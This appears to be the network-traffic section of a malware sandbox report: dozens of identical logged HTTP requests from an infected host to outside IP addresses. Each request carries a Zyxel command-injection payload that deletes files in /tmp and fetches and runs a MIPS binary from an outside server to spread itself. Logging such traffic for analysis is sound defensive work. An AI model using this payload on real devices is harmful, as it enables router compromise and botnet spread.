                                                  Jan 19, 2024 18:23:51.977148056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3414192.168.2.134086640.47.252.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977210045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3415192.168.2.1333912128.140.37.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977236032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3416192.168.2.134764063.31.58.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977292061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3417192.168.2.1360876209.92.64.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977318048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3418192.168.2.1357402206.104.217.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977351904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3419192.168.2.133986662.167.78.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977394104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3420192.168.2.133877873.56.202.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977422953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3421192.168.2.135772886.213.18.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977463961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3422192.168.2.1350650145.170.89.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977518082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3423192.168.2.1347336137.15.132.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977560043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3424192.168.2.135892824.152.187.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977600098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3425192.168.2.13501628.158.24.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977641106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3426192.168.2.1351372110.12.113.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977693081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3427192.168.2.1334148105.138.208.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977751970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3428192.168.2.133519669.190.186.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977802992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3429192.168.2.1340818130.114.36.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977834940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3430192.168.2.135624693.82.115.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977879047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3431192.168.2.1360566164.212.36.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977909088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3432192.168.2.1360042119.55.200.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977962017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3433192.168.2.1342176202.65.94.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.977991104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3434192.168.2.134668837.196.225.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978025913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3435192.168.2.133873295.143.208.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978091955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3436192.168.2.1348662111.152.173.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978113890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3437192.168.2.1346844189.121.231.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978143930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3438192.168.2.1352952180.18.152.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978197098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3439192.168.2.133738845.214.177.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978235960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3440192.168.2.1342724221.106.80.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978286982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3441192.168.2.1336698133.60.118.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978317022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3442192.168.2.13589444.65.90.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978362083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3443192.168.2.135072246.100.223.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978405952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3444192.168.2.133611246.67.150.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978451967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3445192.168.2.13429809.61.1.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978492022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3446192.168.2.134898885.14.73.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978524923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3447192.168.2.1344940177.61.228.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978559017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3448192.168.2.1339344198.20.62.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978610992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3449192.168.2.135630865.28.46.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978662014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3450192.168.2.1333900117.3.200.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978681087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3451192.168.2.134965895.153.68.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978713989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3452192.168.2.13549649.223.196.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978753090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3453192.168.2.1355548204.96.104.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978781939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3454192.168.2.135572053.107.108.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978890896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3455192.168.2.1345404114.170.161.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978934050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3456192.168.2.133641842.109.219.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978955030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3457192.168.2.1344438220.41.117.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.978991032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3458192.168.2.1333858128.230.205.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979024887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3459192.168.2.135999240.143.63.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979068041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3460192.168.2.1333914158.92.77.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979108095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3461192.168.2.1346154157.14.144.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979151011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3462192.168.2.1351066128.21.48.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979196072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3463192.168.2.1350304111.21.7.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979243040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3464192.168.2.1341202120.206.1.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979278088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3465192.168.2.1335158143.180.235.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979337931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3466192.168.2.133751698.187.230.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979373932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3467192.168.2.1340952188.63.197.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979396105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3468192.168.2.133825862.178.72.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979413986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3469192.168.2.1347218199.190.117.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979490042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3470192.168.2.1341992104.67.126.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979526997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3471192.168.2.135064482.92.49.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979553938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3472192.168.2.1356720193.113.103.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979593992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3473192.168.2.133333818.65.149.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979630947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3474192.168.2.1351678183.83.45.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979702950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3475192.168.2.1341562111.178.125.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979732990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3476192.168.2.135240235.233.60.77443
                                                  TimestampBytes transferredDirectionData
